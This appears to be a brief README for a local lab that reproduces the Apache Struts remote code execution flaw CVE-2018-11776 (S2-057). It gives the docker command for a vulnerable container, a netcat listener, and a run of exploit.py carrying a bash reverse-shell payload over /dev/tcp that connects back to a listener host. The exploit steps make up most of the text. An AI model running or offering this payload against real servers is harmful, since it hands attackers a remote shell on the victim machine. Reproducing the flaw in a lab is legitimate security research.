Environment for CVE-2018-11776 / S2-057
$ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776
$ nc -l 10000 (or nc -lp 10000)
$ python3 exploit.py localhost:30080 'bash -i >& /dev/tcp/192.168.33.1/10000 0>&1'